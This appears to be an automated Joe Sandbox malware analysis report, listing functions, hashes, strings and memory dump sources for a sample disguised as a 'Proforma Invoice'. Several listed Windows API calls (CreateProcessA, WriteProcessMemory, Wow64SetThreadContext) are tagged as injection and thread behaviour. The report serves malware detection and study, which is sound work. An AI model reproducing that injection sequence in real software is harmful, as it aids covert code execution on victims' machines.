Instruction Fuzzy Hash: 0D01A470B101211FDB64DAADD85072E73D5E78A714F10843DE50EC7340DE26DD028795

Uniqueness

Uniqueness Score: -1.00%

Function 06C2FEE0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a34b5b001e525c4b77b4c7a1504f0b3a0dfded94e8eb7ba9df77a5a7adc75a
Instruction ID: 1ef24f3e0df97555c363a3201e108e00f05e4e404cf19c4018eb2b4f2443bca6
Opcode Fuzzy Hash: 67a34b5b001e525c4b77b4c7a1504f0b3a0dfded94e8eb7ba9df77a5a7adc75a
Instruction Fuzzy Hash: 4F01B130A4120A9FD751EF7CE84029EBBF1FB81214F10017ED869D3380EB358952CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06C2FEF0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db7d01ea2f20d666120a339e659e3b1e61b9233864c48b54f837b0a57a2c3b3
Instruction ID: d28b6973b00bd52e19f8d2caabfb399570090f931d6b55afffb90b94a3ba2622
Opcode Fuzzy Hash: 3db7d01ea2f20d666120a339e659e3b1e61b9233864c48b54f837b0a57a2c3b3
Instruction Fuzzy Hash: 26F05E70A4120A9FD381EFB8D90026E77E6FB84204F1041798859E3354EF388D42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06C26469 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b476aed307e348d2870f252585c9c5602d15c65eb8d03d14360c2c0aebb168
Instruction ID: 35102879f5e3cfd622293bb3d1507ae13d46d4af8493f3fd567f6ca3fae11082
Opcode Fuzzy Hash: 51b476aed307e348d2870f252585c9c5602d15c65eb8d03d14360c2c0aebb168
Instruction Fuzzy Hash: F6E06870D1521A6BDF60CE71CC2174A3369D701204F1048A6CC04C7301E132EA0183A0

Uniqueness

Uniqueness Score: -1.00%

Function 06C26478 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a5c7f190dc8ea0e10a5cbb8caedcabffcad93f90b28af4a4c9fc777743475e
Instruction ID: 5a2000332a06ad89309d48d8e5cb114da9a70a2192dc04af6bbd92a21dcf9f8a
Opcode Fuzzy Hash: d1a5c7f190dc8ea0e10a5cbb8caedcabffcad93f90b28af4a4c9fc777743475e
Instruction Fuzzy Hash: 37E0C270E1111AABDF50CEB1C91575A73ADD701208F2088A8DC09C7201E176EB018390

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06C27698 Relevance: 13.0, Strings: 10, Instructions: 477COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C27B7D
$^q, xrefs: 06C277AF
$^q, xrefs: 06C27C31
$^q, xrefs: 06C277E0
$^q, xrefs: 06C27C0F
$^q, xrefs: 06C277A3
$^q, xrefs: 06C27B71
$^q, xrefs: 06C27C1B
$^q, xrefs: 06C277D4
$^q, xrefs: 06C27C25

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 3b5e19ece0ddd8a25e78a45bbe8bdad595a997f77798ab15af8a6eb209e27c53
Instruction ID: 0f1b6c2bbbdebc50d89ca359d94b1984d1148fda61b15f5f860e8e193a88082d
Opcode Fuzzy Hash: 3b5e19ece0ddd8a25e78a45bbe8bdad595a997f77798ab15af8a6eb209e27c53
Instruction Fuzzy Hash: EE122D30B0022ACFDB68DF79C99466EB7B2BF84704F2085A9D409AB354DB35DD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2A948 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C2AAD0
$^q, xrefs: 06C2AA4A
$^q, xrefs: 06C2AAFA
$^q, xrefs: 06C2AA99
$^q, xrefs: 06C2AAA5
$^q, xrefs: 06C2AAC4
$^q, xrefs: 06C2AB06
$^q, xrefs: 06C2AA3E

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: b7580c778958a1d03f07a84ac26ac42cdb23772f49b71aca1e08ebc9585a64ed
Instruction ID: 4052357ad07c2156b8b9e4f83b221e4aeadb154f8732e7916cb758f7057b7e95
Opcode Fuzzy Hash: b7580c778958a1d03f07a84ac26ac42cdb23772f49b71aca1e08ebc9585a64ed
Instruction Fuzzy Hash: 8D917F30E0021ADFEB68DFA9DA4476EB7B2EF84704F10852DE801AB254DB399D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06C27098 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C273E0
$^q, xrefs: 06C275AC
.5vq, xrefs: 06C270F3
$^q, xrefs: 06C2737A
$^q, xrefs: 06C275A0
$^q, xrefs: 06C273D4
$^q, xrefs: 06C27534

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 8b326ab202be570c1ddef02ae4d07db1f130df74fc73ec0e5bbf7de241bb2c2f
Instruction ID: 6dd61ae090f413b732350f125e58c5debed471e978bba1c91f43b8466ff92d04
Opcode Fuzzy Hash: 8b326ab202be570c1ddef02ae4d07db1f130df74fc73ec0e5bbf7de241bb2c2f
Instruction Fuzzy Hash: FAF14F34A0021ACFDB58DF69C594A6EB7B2FF84704F20856CD815AB354DB3AEC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C283E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C286A7
$^q, xrefs: 06C2864E
$^q, xrefs: 06C286B3
$^q, xrefs: 06C28642

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 7e61cbee6c8058bbdd80bb8ebe7f5163251fccb620737e71bb181d966f400078
Instruction ID: 394a24122b8e5ee19044934f3c5980aca0e2e23989809532075739e6f6e4ece7
Opcode Fuzzy Hash: 7e61cbee6c8058bbdd80bb8ebe7f5163251fccb620737e71bb181d966f400078
Instruction Fuzzy Hash: 77B14A30A1121ACFDB68DF69C59065EB7B2EF84704F24882DE805EB395DB75DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06C28800 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06C288F3
$^q, xrefs: 06C2888B
$^q, xrefs: 06C2887F
LR^q, xrefs: 06C28942

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 94477dfe61d9857201bab4f1ea22e3fd56f2ca6d9a62ace3519f51b3b0c39221
Instruction ID: 010ca80482e42502bcd78f0cbd4bc1be7d9a51b0927e141000c9f0832683b91d
Opcode Fuzzy Hash: 94477dfe61d9857201bab4f1ea22e3fd56f2ca6d9a62ace3519f51b3b0c39221
Instruction Fuzzy Hash: 21510530B012168FDB58DF29C950A2AB7E2FF84700F14856DD805AF395DB35EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2ACD0 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C2AEAC
$^q, xrefs: 06C2AE83
$^q, xrefs: 06C2AE01
$^q, xrefs: 06C2AE54

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 5648bf93f59c8c5b075caf6e082841cc596fe52f716ef05d5fb050563a20e443
Instruction ID: 8f01c87ca81273dcd83ed49789f97603893ce707a6d30026ac51755414ccd722
Opcode Fuzzy Hash: 5648bf93f59c8c5b075caf6e082841cc596fe52f716ef05d5fb050563a20e443
Instruction Fuzzy Hash: 2C518F30E102169FDF69DBA8D58066DB7B2EB88704F20892DDC06EB354DB35DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: VoAlKljQu.exePID: 7492, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	98.9%
Signature Coverage:	0%
Total number of Nodes:	278
Total number of Limit Nodes:	22

Executed Functions

Function 0719EAC0 Relevance: 7.3, Strings: 5, Instructions: 1026
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pbq, xrefs: 0719F78C
xbaq, xrefs: 0719EBF0
TJcq, xrefs: 0719EC63
4'^q, xrefs: 0719F6B4
Te^q, xrefs: 0719F314

Memory Dump Source

Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: 5e1bb2bc89461c0b47912bd3321fd2565ba62c5b7c76b031d3c2359c034cd97b
Instruction ID: 189b80d85c9e3aa93a737b6a21d8feafc3681f4d6a7b53f3752f21f0971623c8
Opcode Fuzzy Hash: 5e1bb2bc89461c0b47912bd3321fd2565ba62c5b7c76b031d3c2359c034cd97b
Instruction Fuzzy Hash: 3BB2D675E00228DFDB64CF69C984AD9BBB2FF89304F1581E5D509AB265DB319E82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 052068B1 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0520693E
GetCurrentThread.KERNEL32 ref: 0520697B
GetCurrentProcess.KERNEL32 ref: 052069B8
GetCurrentThreadId.KERNEL32 ref: 05206A11

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b131bd4cc2ab54b142b6c523309fc5bc099ca45fb3d87bf3b2fcf64aa7bc197d
Instruction ID: e42743a65ab5c79e90e0e86f43e8747ee69632f2bdb5a4892d9b653a4ac847bc
Opcode Fuzzy Hash: b131bd4cc2ab54b142b6c523309fc5bc099ca45fb3d87bf3b2fcf64aa7bc197d
Instruction Fuzzy Hash: 6D5185B09003098FDB14CFA9C588BDEBBF0EF88314F208459E059AB3A0D774A948CF65

Uniqueness

Uniqueness Score: -1.00%

Function 052068C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0520693E
GetCurrentThread.KERNEL32 ref: 0520697B
GetCurrentProcess.KERNEL32 ref: 052069B8
GetCurrentThreadId.KERNEL32 ref: 05206A11

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c7b48319b7543f79f541a541329c4af7791208aa3c7bf2ce3b39f2424a6e7362
Instruction ID: 69db325083f6b3e24418ff599265d0a7fbae3dd531d344dd4d314640e4e5a436
Opcode Fuzzy Hash: c7b48319b7543f79f541a541329c4af7791208aa3c7bf2ce3b39f2424a6e7362
Instruction Fuzzy Hash: A05175B09007098FDB14CFA9C548BDEBBF1EF88314F208459D059AB3A0D734A948CF65

Uniqueness

Uniqueness Score: -1.00%

Function 07179303 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717953E

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 62291087d8ef74e387d9f761be8f13407ef3f70525cabe21f416ed261b5509e1
Instruction ID: 6a687d622ae7df94a0b7dce6e13e2b760afe122fd98f2ac90993d12159829c50
Opcode Fuzzy Hash: 62291087d8ef74e387d9f761be8f13407ef3f70525cabe21f416ed261b5509e1
Instruction Fuzzy Hash: 6D916FB1D00619DFDF11CFA8C9417EDBBB2BF44314F1481AAE849A7290DB74A985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 07179308 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717953E

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e4758f762d0d345b46f6871d1cb579b2f8778ee4e190fd2b9e83652532542a4b
Instruction ID: 289ec68431352577a853ace12ab049bea37e7305346b71baf1f050bdb9686fe0
Opcode Fuzzy Hash: e4758f762d0d345b46f6871d1cb579b2f8778ee4e190fd2b9e83652532542a4b
Instruction Fuzzy Hash: 3D9170B1D0061ADFDF11CF68C9417DDBBB2BF44314F1481AAE849A7290DB74A985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05204628 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0520487E

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 80cd3dbc675fdf600353ad6f4461882d5c13bcc752ca97748b84c257173cf3f6
Instruction ID: a4c2e3424bdde96091931afe5e701408258b0a9dab32cb93b8d78b9972fcbe19
Opcode Fuzzy Hash: 80cd3dbc675fdf600353ad6f4461882d5c13bcc752ca97748b84c257173cf3f6
Instruction Fuzzy Hash: AE716670A11B058FDB24EF29D54476ABBF1FF88304F008A2DD18AC7A91E774E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0520B065 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0520B182

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5343c6ddfd891cdd8befe895eca9dd2b970adca5e1c0f74ba452d20cea089e29
Instruction ID: 6c4fc8d06819fc48db6acd5f4fdd18764136870e48b40c1d8eb92d3ba7f09ab7
Opcode Fuzzy Hash: 5343c6ddfd891cdd8befe895eca9dd2b970adca5e1c0f74ba452d20cea089e29
Instruction Fuzzy Hash: 1651C0B1D10349DFDB14CFA9C884ADEBBB5BF48310F24812AE819AB250D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0520B070 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0520B182

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d061b0f100a31d8836e1a73f9b28e167e4854eb3f1aa8444aebeeecb213afc9d
Instruction ID: b4d8e8eafdf78ed65e4ad474184181579ed735196e388e295e1bcea85bf8627e
Opcode Fuzzy Hash: d061b0f100a31d8836e1a73f9b28e167e4854eb3f1aa8444aebeeecb213afc9d
Instruction Fuzzy Hash: E741C0B1D10349DFDB14CFA9C884ADEFBB5BF48310F24812AE819AB251D7B19885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01025D0C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01025DC9

Memory Dump Source

Source File: 00000009.00000002.1725475700.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_VoAlKljQu.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fddea3183b080aca3cc1e89894b0d9caaad9133e8cf8ebae2c1c06ad9a5c72cb
Instruction ID: 04d92651cb93432bb762e88cf43d2a5831debee1414922d61cbe0841552645fa
Opcode Fuzzy Hash: fddea3183b080aca3cc1e89894b0d9caaad9133e8cf8ebae2c1c06ad9a5c72cb
Instruction Fuzzy Hash: BA4104B0C00729CEDB24DFA9C844BDEBBF5BF48304F24809AD448AB255DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0520AA2C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0520D701

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1264b63cb5a2304a255c2e835668cd56cb148e73f87e477fa5c299a0dab252f9
Instruction ID: 970e44c72041d44e6054857b351b217823ea2a61bbfa402c8ab110c673720638
Opcode Fuzzy Hash: 1264b63cb5a2304a255c2e835668cd56cb148e73f87e477fa5c299a0dab252f9
Instruction Fuzzy Hash: 4C4118B9A11309CFCB14CF99C488AAABBF5FF88314F24C459D519AB361D774A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010245A4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01025DC9

Memory Dump Source

Source File: 00000009.00000002.1725475700.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_VoAlKljQu.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b2f07c0d8ab445bf5530e0c3b16dee416f9b5b17a659866bb059f8f5a6e0f4b0
Instruction ID: 34a5d606aa6e1c1926a051a012c9422a738fb5b5c145fe4719464eeea83148c2
Opcode Fuzzy Hash: b2f07c0d8ab445bf5530e0c3b16dee416f9b5b17a659866bb059f8f5a6e0f4b0
Instruction Fuzzy Hash: E341F1B0C00729DBDB24DFA9C844BDEBBF5BF49304F2080AAE448AB255DB756945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0717CE8B Relevance: 1.6, APIs: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0717CE55

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0aa3e64129c7eb2e6eff4e505b0cdaaec523da413246223fce4c3656b1c654a0
Instruction ID: 20852007d565b5e8fdc3725c28c29c9768c3887c1856ea8d04514ee87f2d808d
Opcode Fuzzy Hash: 0aa3e64129c7eb2e6eff4e505b0cdaaec523da413246223fce4c3656b1c654a0
Instruction Fuzzy Hash: B73198B690025A8FDB21CFA8D9457EEBFF8AF48310F14405AD444B7280CB35AA84DBF0

Uniqueness

Uniqueness Score: -1.00%

Function 07179078 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07179110

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 055711e63ab677057ca30d98867f8c2f7332c00dea18f69a4146b8a7a2e71afb
Instruction ID: f47a0a24aa4a771c823a366db3ae8c4f188bd1c3c66a5082b25ed475f9391f83
Opcode Fuzzy Hash: 055711e63ab677057ca30d98867f8c2f7332c00dea18f69a4146b8a7a2e71afb
Instruction Fuzzy Hash: E0214BB5900359DFCB10DFA9C885BDEBBF5FF48320F10842AE958A7250C7749554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07179080 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07179110

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a69e4b1e5de1d186654b9197edf648ed6aec5a5daac2409ed376d0447d8107a2
Instruction ID: c0af4da1536d85ad488718c1f8ce4791d578c84423a8ab5540bcc8a88bb981ce
Opcode Fuzzy Hash: a69e4b1e5de1d186654b9197edf648ed6aec5a5daac2409ed376d0447d8107a2
Instruction Fuzzy Hash: C02139B1900359DFCB10DFA9C885BDEBBF5FF48320F10842AE958A7250C778A954DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07178AA8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07178B2E

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 03836a3550518346972325c8175c65d9ad4569b060e3b6b3e003840c8093b06e
Instruction ID: af484b93429c0b44368d904b3d376fdcf2f59631234bfb70fc60f2d74708d8b5
Opcode Fuzzy Hash: 03836a3550518346972325c8175c65d9ad4569b060e3b6b3e003840c8093b06e
Instruction Fuzzy Hash: 162157B19003498FCB10CFAAC485BEEBBF4EF48324F10842AD459A7241D7789A85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05206B00 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05206B8F

Memory Dump Source

Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2e6d188dbffc312af620d9f6bab5bc316867f4d3f3246a4a7216237b31ffd387
Instruction ID: 44dfa01badb7dd4685cccb0bb4030cd2a163889faac1959a71a868b1e9824830
Opcode Fuzzy Hash: 2e6d188dbffc312af620d9f6bab5bc316867f4d3f3246a4a7216237b31ffd387
Instruction Fuzzy Hash: 862103B59002499FDB10CFAAD985ADEBFF8EF48320F14841AE958A3351D374A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07179168 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071791F0

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cbf21d66745927113979099c69f5086d20c3113d21ff532950424ee209d5e0f6
Instruction ID: 7eaf39ca41aec7c7b1b4ec80e34df92a87201d02749321840ea369f3da4761a9
Opcode Fuzzy Hash: cbf21d66745927113979099c69f5086d20c3113d21ff532950424ee209d5e0f6
Instruction Fuzzy Hash: 622136B18003599FCB10DFAAC881BEEBBF5FF48320F10842AE959A7250D7389554DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07179170 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071791F0

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c6d6f895f3cb1ffa120fd4ebf11a5d7603b4a093249eb0ba2f45fee8cca38f3d
Instruction ID: 085365bb2b9d049a685c0e7f4cdf68924539d570af08db3450fde24ff6c7c2a9
Opcode Fuzzy Hash: c6d6f895f3cb1ffa120fd4ebf11a5d7603b4a093249eb0ba2f45fee8cca38f3d
Instruction Fuzzy Hash: B32116B19002599FCB10DFAAC885BDEBBF5FF48320F108429E559A7250C774A544DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07178AB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07178B2E

Memory Dump Source

Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 344900582ba574983c5961421c6e8edbf9780b730230cdd1e063d0d557bbcc47
Instruction ID: 88290a36e0d821443c70e8214f6c6698cb93bc2e61e1100eb5897d1a1d9ed361
Opcode Fuzzy Hash: 344900582ba574983c5961421c6e8edbf9780b730230cdd1e063d0d557bbcc47
